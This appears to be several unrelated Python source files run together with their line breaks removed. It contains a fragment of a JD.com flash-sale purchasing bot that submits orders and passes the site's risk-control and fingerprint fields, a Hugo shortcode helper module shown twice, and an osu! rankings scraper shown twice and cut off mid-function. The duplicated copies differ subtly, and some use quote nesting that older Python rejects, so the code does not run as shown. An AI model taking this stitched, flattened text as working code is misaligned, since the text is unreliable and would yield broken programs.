bool(soup.select('h3.ftx-02')) # [<h3 class="ftx-02">商品已成功加入购物车!</h3>] if result: logger.info('%s 已成功加入购物车', params['pid']) break else: i += 1 logger.error('%s 添加购物车失败,开始第 %s 次重试', params['pid'], i) logger.error('响应数据:%s', resp) except requests.exceptions.ConnectTimeout as e: i += 1 logger.error('%s 添加购物车请求发送超时,开始第 %s 次重试', params['pid'], i) except requests.exceptions.ReadTimeout as e: logger.info('已发送添加到购物车请求,为提高抢购速度,已截断响应数据') break self.request_info['add_cart_request'] = add_cart_request get_checkout_page_request_headers = self.headers.copy() # 初始化订单结算页请求方法 if fast_mode and is_risk_control is False: # get_checkout_page_request_headers['cookie'] = cookie_str def get_checkout_page_request(params): logger.info('订单结算请求') i = 0 def res_func(conn): while True: data = conn.recv(1) conn.invalidate() logger.info('订单结算请求已接收-为提高抢购速度,已截断响应数据') return None if not self.is_get_checkout_page.get(0): while i < 3: try: url = 'https://trade.jd.com/shopping/order/getOrderInfo.action' resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=get_checkout_page_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'trade.jd.com'), params=params, res_func=res_func) self.is_get_checkout_page[0] = True # 从响应头中提取cookies并更新 # cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() break except Exception as e: i += 1 logger.error('订单结算请求错误,开始第 %s 次重试,信息:%s', i, e) else: def get_checkout_page_request(params): i = 0 resp = None while i < 3: try: # url = 'https://cart.jd.com/gotoOrder.action' resp = self.sess.get(url='https://trade.jd.com/shopping/order/getOrderInfo.action', headers=get_checkout_page_request_headers, params=params, timeout=(0.2, 0.07)) if not response_status(resp): logger.error('获取订单结算页信息失败') return soup = BeautifulSoup(resp.text, "html.parser") self.risk_control = get_tag_value(soup.select('input#riskControl'), 'value') # order_detail = { # 'address': soup.find('span', id='sendAddr').text[5:], # remove '寄送至: ' from the begin # 'receiver': soup.find('span', id='sendMobile').text[4:], # remove '收件人:' from the begin # 'total_price': soup.find('span', id='sumPayPriceId').text[1:], # remove '¥' from the begin # 'items': [] # } # T O D O: 这里可能会产生解析问题,待修复 # for item in soup.select('div.goods-list div.goods-items'): # div_tag = item.select('div.p-price')[0] # order_detail.get('items').append({ # 'name': get_tag_value(item.select('div.p-name a')), # 'price': get_tag_value(div_tag.select('strong.jd-price'))[2:], # remove '¥ ' from the begin # 'num': get_tag_value(div_tag.select('span.p-num'))[1:], # remove 'x' from the begin # 'state': get_tag_value(div_tag.select('span.p-state')) # in stock or out of stock # }) # logger.info("下单信息:%s", order_detail) # return order_detail return except requests.exceptions.ConnectTimeout as e: i += 1 logger.error('订单结算页面数据连接超时,开始第 %s 次重试', i) except requests.exceptions.ReadTimeout as e: logger.info('已发送订单结算请求,为提高抢购速度,已截断响应数据') break except Exception as e: logger.error('订单结算页面数据解析异常(可以忽略),报错信息:%s', e) if resp: logger.error('resp.text:%s', resp.text) break self.request_info['get_checkout_page_request'] = get_checkout_page_request # 初始化提交订单请求方法 submit_order_request_data = { 'overseaPurchaseCookies': '', 'vendorRemarks': '[]', 'submitOrderParam.sopNotPutInvoice': 'false', 'submitOrderParam.trackID': 'TestTrackId', 'submitOrderParam.ignorePriceChange': '0', 'submitOrderParam.btSupport': '0', 'riskControl': self.risk_control, 'submitOrderParam.isBestCoupon': 1, 'submitOrderParam.jxj': 1, 'submitOrderParam.trackId': self.track_id, # T o d o: need to get trackId 'submitOrderParam.eid': self.eid, 'submitOrderParam.fp': self.fp, 'submitOrderParam.needCheck': 1 } submit_order_request_headers = { 'User-Agent': self.user_agent, 'Host': 'trade.jd.com', 'Referer': 'https://trade.jd.com/shopping/order/getOrderInfo.action' } # 如果有密码则设置 payment_pwd = global_config.get('account', 'payment_pwd') if payment_pwd: submit_order_request_data['submitOrderParam.payPassword'] = encrypt_payment_pwd(payment_pwd) if fast_mode: # submit_order_request_headers['cookie'] = cookie_str def submit_order_request(): submit_order_request_data['riskControl'] = self.risk_control logger.info('提交订单请求') try: resp = http_util.send_http_request(self.socket_client, url='https://trade.jd.com/shopping/order/submitOrder.action', method='POST', headers=submit_order_request_headers, cookies=self.get_cookies_str_by_domain_or_path('trade.jd.com'), data=submit_order_request_data) response_data = resp.body if response_data: try: resp_json = json.loads(response_data) if resp_json.get('success'): order_id = resp_json.get('orderId') logger.info('订单提交成功! 订单号:%s', order_id) if self.send_message: self.messenger.send(text='jd-assistant 订单提交成功', desp='订单号:%s' % order_id) return True else: message, result_code = resp_json.get('message'), resp_json.get('resultCode') if result_code == 0: message = message + '(下单失败)' # self._save_invoice() # message = message + '(下单商品可能为第三方商品,将切换为普通发票进行尝试)' elif result_code == 60077: message = message + '(可能是购物车为空 或 未勾选购物车中商品)' elif result_code == 60123: message = message + '(需要在config.ini文件中配置支付密码)' elif result_code == 600158: logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'很抱歉,您抢购的商品无货!本次抢购结束') return True logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'响应数据:\n{resp_json}') return False except Exception: logger.info('数据解析异常,响应数据:\n %s', response_data) return False else: logger.info('下单请求异常,无响应数据') return False except Exception as e: logger.error(e) return False else: def submit_order_request(): try: submit_order_request_data['riskControl'] = self.risk_control resp = self.sess.post(url='https://trade.jd.com/shopping/order/submitOrder.action', headers=submit_order_request_headers, data=submit_order_request_data) # 暂时不设置超时时间 # resp = self.sess.post(url=url, data=data, headers=headers, timeout=(0.1, 0.08)) resp_json = json.loads(resp.text) # 返回信息示例: # 下单失败 # {'overSea': False, 'orderXml': None, 'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 60123, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': '请输入支付密码!'} # {'overSea': False, 'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'orderXml': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 60017, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': '您多次提交过快,请稍后再试'} # {'overSea': False, 'orderXml': None, 'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 60077, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': '获取用户订单信息失败'} # {"cartXml":null,"noStockSkuIds":"xxx","reqInfo":null,"hasJxj":false,"addedServiceList":null,"overSea":false,"orderXml":null,"sign":null,"pin":"xxx","needCheckCode":false,"success":false,"resultCode":600157,"orderId":0,"submitSkuNum":0,"deductMoneyFlag":0,"goJumpOrderCenter":false,"payInfo":null,"scaleSkuInfoListVO":null,"purchaseSkuInfoListVO":null,"noSupportHomeServiceSkuList":null,"msgMobile":null,"addressVO":{"pin":"xxx","areaName":"","provinceId":xx,"cityId":xx,"countyId":xx,"townId":xx,"paymentId":0,"selected":false,"addressDetail":"xx","mobile":"xx","idCard":"","phone":null,"email":null,"selfPickMobile":null,"selfPickPhone":null,"provinceName":null,"cityName":null,"countyName":null,"townName":null,"giftSenderConsigneeName":null,"giftSenderConsigneeMobile":null,"gcLat":0.0,"gcLng":0.0,"coord_type":0,"longitude":0.0,"latitude":0.0,"selfPickOptimize":0,"consigneeId":0,"selectedAddressType":0,"siteType":0,"helpMessage":null,"tipInfo":null,"cabinetAvailable":true,"limitKeyword":0,"specialRemark":null,"siteProvinceId":0,"siteCityId":0,"siteCountyId":0,"siteTownId":0,"skuSupported":false,"addressSupported":0,"isCod":0,"consigneeName":null,"pickVOname":null,"shipmentType":0,"retTag":0,"tagSource":0,"userDefinedTag":null,"newProvinceId":0,"newCityId":0,"newCountyId":0,"newTownId":0,"newProvinceName":null,"newCityName":null,"newCountyName":null,"newTownName":null,"checkLevel":0,"optimizePickID":0,"pickType":0,"dataSign":0,"overseas":0,"areaCode":null,"nameCode":null,"appSelfPickAddress":0,"associatePickId":0,"associateAddressId":0,"appId":null,"encryptText":null,"certNum":null,"used":false,"oldAddress":false,"mapping":false,"addressType":0,"fullAddress":"xxxx","postCode":null,"addressDefault":false,"addressName":null,"selfPickAddressShuntFlag":0,"pickId":0,"pickName":null,"pickVOselected":false,"mapUrl":null,"branchId":0,"canSelected":false,"address":null,"name":"xxx","message":null,"id":0},"msgUuid":null,"message":"xxxxxx商品无货"} # {'orderXml': None, 'overSea': False, 'noStockSkuIds': 'xxx', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'cartXml': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 600158, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': {'oldAddress': False, 'mapping': False, 'pin': 'xxx', 'areaName': '', 'provinceId': xx, 'cityId': xx, 'countyId': xx, 'townId': xx, 'paymentId': 0, 'selected': False, 'addressDetail': 'xxxx', 'mobile': 'xxxx', 'idCard': '', 'phone': None, 'email': None, 'selfPickMobile': None, 'selfPickPhone': None, 'provinceName': None, 'cityName': None, 'countyName': None, 'townName': None, 'giftSenderConsigneeName': None, 'giftSenderConsigneeMobile': None, 'gcLat': 0.0, 'gcLng': 0.0, 'coord_type': 0, 'longitude': 0.0, 'latitude': 0.0, 'selfPickOptimize': 0, 'consigneeId': 0, 'selectedAddressType': 0, 'newCityName': None, 'newCountyName': None, 'newTownName': None, 'checkLevel': 0, 'optimizePickID': 0, 'pickType': 0, 'dataSign': 0, 'overseas': 0, 'areaCode': None, 'nameCode': None, 'appSelfPickAddress': 0, 'associatePickId': 0, 'associateAddressId': 0, 'appId': None, 'encryptText': None, 'certNum': None, 'addressType': 0, 'fullAddress': 'xxxx', 'postCode': None, 'addressDefault': False, 'addressName': None, 'selfPickAddressShuntFlag': 0, 'pickId': 0, 'pickName': None, 'pickVOselected': False, 'mapUrl': None, 'branchId': 0, 'canSelected': False, 'siteType': 0, 'helpMessage': None, 'tipInfo': None, 'cabinetAvailable': True, 'limitKeyword': 0, 'specialRemark': None, 'siteProvinceId': 0, 'siteCityId': 0, 'siteCountyId': 0, 'siteTownId': 0, 'skuSupported': False, 'addressSupported': 0, 'isCod': 0, 'consigneeName': None, 'pickVOname': None, 'shipmentType': 0, 'retTag': 0, 'tagSource': 0, 'userDefinedTag': None, 'newProvinceId': 0, 'newCityId': 0, 'newCountyId': 0, 'newTownId': 0, 'newProvinceName': None, 'used': False, 'address': None, 'name': 'xx', 'message': None, 'id': 0}, 'msgUuid': None, 'message': 'xxxxxx商品无货'} # 下单成功 # {'overSea': False, 'orderXml': None, 'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': True, 'resultCode': 0, 'orderId': 8740xxxxx, 'submitSkuNum': 1, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': None} if resp_json.get('success'): order_id = resp_json.get('orderId') logger.info('订单提交成功! 订单号:%s', order_id) if self.send_message: self.messenger.send(text='jd-assistant 订单提交成功', desp='订单号:%s' % order_id) return True else: message, result_code = resp_json.get('message'), resp_json.get('resultCode') if result_code == 0: message = message + '(下单失败)' # self._save_invoice() # message = message + '(下单商品可能为第三方商品,将切换为普通发票进行尝试)' elif result_code == 60077: message = message + '(可能是购物车为空 或 未勾选购物车中商品)' elif result_code == 60123: message = message + '(需要在config.ini文件中配置支付密码)' elif result_code == 600158: logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'很抱歉,您抢购的商品无货!本次抢购结束') return True logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'响应数据:\n{resp_json}') return False except Exception as e: logger.error(e) return False self.request_info['submit_order_request'] = submit_order_request def make_seckill_connect(self): # 获取商品抢购链接请求(多种,目前添加2种) self.socket_client.init_pool("itemko.jd.com", 443, 1, 20) self.socket_client.init_pool("item-soa.jd.com", 443, 1, 20) # 访问商品抢购链接请求 self.socket_client.init_pool("yushou.jd.com", 443, 1, 10) # 访问抢购订单结算页面请求方法 # 获取秒杀初始化信息请求 self.socket_client.init_pool("marathon.jd.com", 443, 1, 10) # 【兼容】购物车请求 self.socket_client.init_pool("cart.jd.com", 443, 1, 10) # 提交抢购(秒杀)订单请求 self.socket_client.init_pool("trade.jd.com", 443, 1, 10) def make_reserve_seckill_connect(self): self.socket_client.init_pool("cart.jd.com", 443, 1) self.socket_client.init_pool("trade.jd.com", 443, 1, 15) def connect_now(self): self.socket_client.connect() def close_now(self): self.socket_client.close_client() def get_and_update_cookies_str(self): cookie_array = [] for cookie in iter(self.sess.cookies): cookie_array.append(f'{cookie.name}={cookie.value};') self.cookies_str = ''.join(cookie_array) return self.cookies_str def get_cookies_str_by_domain_or_path(self, domain=None, path=None): cookie_array = [] if domain is None: if path is None: for cookie in iter(self.sess.cookies): cookie_array.append(f'{cookie.name}={cookie.value};') else: for cookie in iter(self.sess.cookies): if cookie.path == path: cookie_array.append(f'{cookie.name}={cookie.value};') elif path is None: if domain is None: for cookie in iter(self.sess.cookies): cookie_array.append(f'{cookie.name}={cookie.value};') else: for cookie in iter(self.sess.cookies): if cookie.domain in domain: cookie_array.append(f'{cookie.name}={cookie.value};') else: for cookie in iter(self.sess.cookies): if ( (cookie.domain in domain) and (cookie.path == path) ): cookie_array.append(f'{cookie.name}={cookie.value};') return ''.join(cookie_array) def start_by_config(self, config=global_config): if config.select_mode == 1: # 执行【预约抢购,不会自动加入购物车】 self.exec_seckill_by_time(config) elif config.select_mode == 2: # 执行【预约抢购,自动加入购物车】 手动清空自动添加到购物车的 self.exec_reserve_seckill_by_time(config)
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """Hugo helpers.""" import yaml from datetime import datetime import hashlib r""" # Set type to 'posts' if you want to render page as blogpost type = "posts" # Set page weight to re-arrange items in file-tree menu. weight = 10 # Set how many table of contents levels to be showed on page. geekdocToC = 3 # Set a description for the current page. This will be shown in toc-trees objects. geekdocDescription = # Set false to hide the whole left navigation sidebar. Beware that it will make # navigation pretty hard without adding some kind of on-page navigation. geekdocNav = true # Show a breadcrumb navigation bar at the top of each docs page. geekdocBreadcrumb = false # Set source repository location. geekdocRepo = "https://github.com/thegeeklab/hugo-geekdoc" # Enable "Edit this page" links. Requires 'GeekdocRepo' param and path must point # to 'content' directory of repo. geekdocEditPath = "edit/main/exampleSite/content" # Used for 'Edit this page' link, set to '.File.Path' by default. # Can be overwritten by a path relative to 'geekdocEditPath' geekdocFilePath = # Set to mark page as flat section (file-tree menu only). geekdocFlatSection = true # Set true to hide page or section from side menu (file-tree menu only). geekdocHidden = true # Set false to show this page as a file-tree menu entry when you want it to be hidden in the sidebar. # NOTE: Only applies when 'geekdocHidden = true'. geekdocHiddenTocTree = true # Set to true to make a section foldable in side menu. geekdocCollapseSection = true # Add an anchor link to headlines. geekdocAnchor = true # If you have protected some pages with e.g. basic authentication you may want to exclude these pages # from data file, otherwise information may be leaked. Setting this parameter to 'true' will exclude the # page from search data, feeds, etc. # WARNING: Consider hosting a standalone, fully auth-protected static page for secret information instead! geekdocProtected = false # Set 'left' (default), 'center' or 'right' to configure the text align of a page. geekdocAlign = "left" """ class Page(object): def __init__(self, title, description): self.weight = 99 self.type = None # type: str self.geekdocFlatSection = None # type: bool self.geekdocCollapseSection = None # type: bool self.geekdocAnchor = None # type: bool self.geekdocProtected = None # type: bool self.geekdocEditPath = None # type: str self.geekdocRepo = None # type: str self.geekdocToC = None # type: int self.geekdocBreadcrumb = None # type: bool self.geekdocNav = None # type: bool self.geekdocHidden = None # type: bool self.geekdocHiddenTocTree = None # type: bool self.geekdocFilePath = None # type: bool self.geekdocAlign = "left" self.title = title self.description = description self.geekdocDescription = description self.body = "" # @property # def date(self): # return datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ") @property def content(self): hdict = {} for i in dir(self): if i.startswith("_"): continue if i in ["content", "body"]: continue aval = getattr(self, i) if callable(aval): continue if isinstance(aval, str): val = aval if not val: val = None elif isinstance(aval, dict): val = aval if not val: val = None else: try: val = list(iter(aval)) if not val: val = None except TypeError: val = aval if val is None: continue hdict[i] = val dump_fmt = yaml.safe_dump(hdict) return f""" --- {dump_fmt} --- {self.body} """.lstrip() class Tab(object): def __init__(self): self.tabs = [] def add_tab(self, tab_name: str, content: str): self.tabs.append( "\n".join( [ '{{< tab "__name__" >}}'.replace("__name__", tab_name), content, "{{< /tab >}}", ] ) ) @property def id(self): return hashlib.md5("".join(self.tabs).encode()).hexdigest() @property def content(self): ret = [] ret.append('{{< tabs "__" >}}'.replace("__", self.id)) ret.append("\n".join(self.tabs)) ret.append("{{< /tabs >}}") return "\n".join(ret) class ShortCode(object): @classmethod def _hint(cls, txt, hint_type: str): return "\n".join( [ f"{{{{< hint {hint_type} >}}}}", txt, "{{< /hint >}}", ] ) @classmethod def hint_ok(cls, txt): return cls._hint(txt, "ok") @classmethod def hint_info(cls, txt): return cls._hint(txt, "info") @classmethod def hint_warning(cls, txt): return cls._hint(txt, "warning") @classmethod def hint_danger(cls, txt): return cls._hint(txt, "danger") @classmethod def icon(cls, icon_name): return f"{{{{< icon {icon_name} >}}}}" @classmethod def button_relative(cls, txt, link): out = [] out.append(f'{{{{< button relref='{link}' >}}}}') out.append(txt) out.append("{{< /button >}}") return "\n".join(out) @classmethod def button_external(cls, txt, link): out = [] out.append(f'{{{{< button href='{link}' >}}}}') out.append(txt) out.append("{{< /button >}}") return "\n".join(out) @classmethod def expand(cls, content, label=None): out = [] if label: out.append('{{< expand "__" "..." >}}'.replace("__", label)) else: out.append("{{< expand >}}") out.append(content) out.append("{{< /expand >}}") return "\n".join(out) @classmethod def _video(cls, url: str, vid_type: str): txt = [] standalone = " ".join(["controls"]) attribs = " ".join( [ f'{k}="{v}"' for k, v in { "autoplay": "true", "loop": "true", }.items() ] ) txt.append('<div class="video-container">') txt.append(f"<video {standalone} {attribs}>") txt.append(f'<source src="{url}" type="video/{vid_type}">') txt.append("</video>") txt.append("</div>") return "\n".join(txt) @classmethod def webm(cls, url): return cls._video(url, "webm") @classmethod def mp4(cls, url): return cls._video(url, "mp4") @classmethod def code(cls, body, lang=""): txt = [] txt.append("") txt.append(f"```{lang}") txt.append(body) txt.append("```") txt.append("") return "\n".join(txt) @classmethod def quote_bold(cls, txt: str): return "\n".join([f"> **{i}**" if i else "> " for i in txt.splitlines()]) @classmethod def quote(cls, txt: str): return "\n".join([f"> {i}" if i else "> " for i in txt.splitlines()])
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """Hugo helpers.""" import yaml from datetime import datetime import hashlib r""" # Set type to 'posts' if you want to render page as blogpost type = "posts" # Set page weight to re-arrange items in file-tree menu. weight = 10 # Set how many table of contents levels to be showed on page. geekdocToC = 3 # Set a description for the current page. This will be shown in toc-trees objects. geekdocDescription = # Set false to hide the whole left navigation sidebar. Beware that it will make # navigation pretty hard without adding some kind of on-page navigation. geekdocNav = true # Show a breadcrumb navigation bar at the top of each docs page. geekdocBreadcrumb = false # Set source repository location. geekdocRepo = "https://github.com/thegeeklab/hugo-geekdoc" # Enable "Edit this page" links. Requires 'GeekdocRepo' param and path must point # to 'content' directory of repo. geekdocEditPath = "edit/main/exampleSite/content" # Used for 'Edit this page' link, set to '.File.Path' by default. # Can be overwritten by a path relative to 'geekdocEditPath' geekdocFilePath = # Set to mark page as flat section (file-tree menu only). geekdocFlatSection = true # Set true to hide page or section from side menu (file-tree menu only). geekdocHidden = true # Set false to show this page as a file-tree menu entry when you want it to be hidden in the sidebar. # NOTE: Only applies when 'geekdocHidden = true'. geekdocHiddenTocTree = true # Set to true to make a section foldable in side menu. geekdocCollapseSection = true # Add an anchor link to headlines. geekdocAnchor = true # If you have protected some pages with e.g. basic authentication you may want to exclude these pages # from data file, otherwise information may be leaked. Setting this parameter to 'true' will exclude the # page from search data, feeds, etc. # WARNING: Consider hosting a standalone, fully auth-protected static page for secret information instead! geekdocProtected = false # Set 'left' (default), 'center' or 'right' to configure the text align of a page. geekdocAlign = "left" """ class Page(object): def __init__(self, title, description): self.weight = 99 self.type = None # type: str self.geekdocFlatSection = None # type: bool self.geekdocCollapseSection = None # type: bool self.geekdocAnchor = None # type: bool self.geekdocProtected = None # type: bool self.geekdocEditPath = None # type: str self.geekdocRepo = None # type: str self.geekdocToC = None # type: int self.geekdocBreadcrumb = None # type: bool self.geekdocNav = None # type: bool self.geekdocHidden = None # type: bool self.geekdocHiddenTocTree = None # type: bool self.geekdocFilePath = None # type: bool self.geekdocAlign = "left" self.title = title self.description = description self.geekdocDescription = description self.body = "" # @property # def date(self): # return datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ") @property def content(self): hdict = {} for i in dir(self): if i.startswith("_"): continue if i in ["content", "body"]: continue aval = getattr(self, i) if callable(aval): continue if isinstance(aval, str): val = aval if not val: val = None elif isinstance(aval, dict): val = aval if not val: val = None else: try: val = list(iter(aval)) if not val: val = None except TypeError: val = aval if val is None: continue hdict[i] = val dump_fmt = yaml.safe_dump(hdict) return f""" --- {dump_fmt} --- {self.body} """.lstrip() class Tab(object): def __init__(self): self.tabs = [] def add_tab(self, tab_name: str, content: str): self.tabs.append( "\n".join( [ '{{< tab "__name__" >}}'.replace("__name__", tab_name), content, "{{< /tab >}}", ] ) ) @property def id(self): return hashlib.md5("".join(self.tabs).encode()).hexdigest() @property def content(self): ret = [] ret.append('{{< tabs "__" >}}'.replace("__", self.id)) ret.append("\n".join(self.tabs)) ret.append("{{< /tabs >}}") return "\n".join(ret) class ShortCode(object): @classmethod def _hint(cls, txt, hint_type: str): return "\n".join( [ f"{{{{< hint {hint_type} >}}}}", txt, "{{< /hint >}}", ] ) @classmethod def hint_ok(cls, txt): return cls._hint(txt, "ok") @classmethod def hint_info(cls, txt): return cls._hint(txt, "info") @classmethod def hint_warning(cls, txt): return cls._hint(txt, "warning") @classmethod def hint_danger(cls, txt): return cls._hint(txt, "danger") @classmethod def icon(cls, icon_name): return f"{{{{< icon {icon_name} >}}}}" @classmethod def button_relative(cls, txt, link): out = [] out.append(f'{{{{< button relref="{link}" >}}}}') out.append(txt) out.append("{{< /button >}}") return "\n".join(out) @classmethod def button_external(cls, txt, link): out = [] out.append(f'{{{{< button href="{link}" >}}}}') out.append(txt) out.append("{{< /button >}}") return "\n".join(out) @classmethod def expand(cls, content, label=None): out = [] if label: out.append('{{< expand "__" "..." >}}'.replace("__", label)) else: out.append("{{< expand >}}") out.append(content) out.append("{{< /expand >}}") return "\n".join(out) @classmethod def _video(cls, url: str, vid_type: str): txt = [] standalone = " ".join(["controls"]) attribs = " ".join( [ f'{k}="{v}"' for k, v in { "autoplay": "true", "loop": "true", }.items() ] ) txt.append('<div class="video-container">') txt.append(f"<video {standalone} {attribs}>") txt.append(f'<source src="{url}" type="video/{vid_type}">') txt.append("</video>") txt.append("</div>") return "\n".join(txt) @classmethod def webm(cls, url): return cls._video(url, "webm") @classmethod def mp4(cls, url): return cls._video(url, "mp4") @classmethod def code(cls, body, lang=""): txt = [] txt.append("") txt.append(f"```{lang}") txt.append(body) txt.append("```") txt.append("") return "\n".join(txt) @classmethod def quote_bold(cls, txt: str): return "\n".join([f"> **{i}**" if i else "> " for i in txt.splitlines()]) @classmethod def quote(cls, txt: str): return "\n".join([f"> {i}" if i else "> " for i in txt.splitlines()])
''' 主程序 @author: PurePeace @time: 2020年2月10日 02:03:09 ''' import time, datetime, re, requests, random, json from bs4 import BeautifulSoup requests.adapters.DEFAULT_RETRIES = 999 # 增加重连次数 # get now timeString or timeStamp def getTime(needFormat=0, formatMS=True): if needFormat != 0: return datetime.datetime.now().strftime(f'%Y-%m-%d %H:%M:%S{r'.%f' if formatMS else ''}') else: return time.time() # breakTime:每爬一页休息几秒 def getPage(country='CN', index=1, breakTime=1, datas=[], startTime=0): if datas != None and len(datas) > 0: #print(f'[{getTime(1)}]:已获取第{index}页数据共{len(datas)}条,耗时:{round(getTime()-startTime, 3)}s.\n') return datas time.sleep(breakTime + random.random()) header = {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1'} #print(f'[{getTime(1)}]:正在获取第{index}页数据...') startTime = getTime() try: page = requests.get(f'https://osu.ppy.sh/rankings/osu/performance?country={country}&page={index}', headers=header, timeout=30) soup = BeautifulSoup(page.text, 'lxml') datas = soup.find_all('tr', attrs={'class':'ranking-page-table__row'}) except: datas = [] if len(datas) == 0 or datas == None: #print(f'[{getTime(1)}]:获取第{index}页数据时失败,稍后进行重试...') time.sleep(breakTime * 3 + random.random()) return getPage(country, index, breakTime, datas, startTime) def userData(pageData, index=0): needs = ('rank','acc','pc','pp','ss','s','a') number = re.compile(r'\d+\.?\d*') se = pageData[index].find_all('td', attrs={'class': 'ranking-page-table__column'}) user = se.pop(1).find('a', attrs={'class': 'ranking-page-table__user-link-text js-usercard'}) userid = user.attrs.get('data-user-id') username = user.text.strip() data = { k: number.findall(se[i].text.replace(',',''))[0] for i, k in enumerate(needs) } data['username'], data['userid'] = username, userid if 'ranking-page-table__row--inactive' in pageData[index].attrs['class']: data['status'] = 'inactive' else: data['status'] = 'active' return data def fetchData(startPage=1, endPage=1, country='CN'): from concurrent.futures import ThreadPoolExecutor, wait, ALL_COMPLETED data = [] print(f'[{getTime(1)}]:开始工作,抓取行政区:[{country}];起始页:{startPage},结束页:{endPage}\n') #for idx in range(startPage, endPage+1): # thisPage = getPage(country, index=idx) # userDatas = [userData(thisPage, index=i) for i in range(len(thisPage))] # data.append({'country': country, 'page': idx, 'data': userDatas, 'time': getTime(1)}) def getDone(f): thisPage = f.result() userDatas = [userData(thisPage, index=i) for i in range(len(thisPage))] data.append({'country': country, 'page': idx, 'data': userDatas, 'time': getTime(1)}) print(f'\r当前任务已完成({len(data)}/{endPage-startPage+1})', end='') with ThreadPoolExecutor(max_workers=16) as executor: tasks = [] for idx in range(startPage, endPage + 1): ft = executor.submit(getPage, country, index=idx) ft.add_done_callback(getDone) tasks.append(ft) wait(tasks, return_when=ALL_COMPLETED) return {'data': data, 'country': country, 'time': getTime(1)} # country: # '' == global ranking; # 'CN', 'US, 'UK' ... == country ranking def getRankings(country=''): startPage=60 endPage=100 sstart = time.time() print(f'开始排行榜!起始:{startPage},终止:{endPage},地区:{country}') data = fetchData(startPage=startPage, endPage=endPage, country=country) print('完毕。') return data if __name__ == '__main__': # go data = getRankings() # fix data print('开始处理玩家...') players = [] for page in data['data']: for player in page['data']: players.append(player) #print(player['userid']) print('完毕,全部玩家:', len(players)) # request local api to get player data, and calculate cost print('开工...') tries = 0 for p in players: try: tries += 1 print(f'[{tries}] do -> ',p['userid']) dstart = time.time() r = requests.get('http://127.0.0.1:8989/player/{}'.format(p['userid']), timeout=120) d = r.json() ddone = time.time() - dstart if d.get('status') == 0: print(f'[{tries}] sb(0) -> ', p['userid'], f' ({ddone})s') players.append(p) print(f'[{tries}] done -> ',p['userid'], f' ({ddone})s') except: ddone = time.time() - dstart print(f'[{tries}] sb(1) -> ', p['userid'], f' ({ddone})s') players.append(p) print('任务完成,总用时:', time.time() - sstart, 's')
''' 主程序 @author: PurePeace @time: 2020年2月10日 02:03:09 ''' import time, datetime, re, requests, random, json from bs4 import BeautifulSoup requests.adapters.DEFAULT_RETRIES = 999 # 增加重连次数 # get now timeString or timeStamp def getTime(needFormat=0, formatMS=True): if needFormat != 0: return datetime.datetime.now().strftime(f'%Y-%m-%d %H:%M:%S{r".%f" if formatMS else ""}') else: return time.time() # breakTime:每爬一页休息几秒 def getPage(country='CN', index=1, breakTime=1, datas=[], startTime=0): if datas != None and len(datas) > 0: #print(f'[{getTime(1)}]:已获取第{index}页数据共{len(datas)}条,耗时:{round(getTime()-startTime, 3)}s.\n') return datas time.sleep(breakTime + random.random()) header = {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1'} #print(f'[{getTime(1)}]:正在获取第{index}页数据...') startTime = getTime() try: page = requests.get(f'https://osu.ppy.sh/rankings/osu/performance?country={country}&page={index}', headers=header, timeout=30) soup = BeautifulSoup(page.text, 'lxml') datas = soup.find_all('tr', attrs={'class':'ranking-page-table__row'}) except: datas = [] if len(datas) == 0 or datas == None: #print(f'[{getTime(1)}]:获取第{index}页数据时失败,稍后进行重试...') 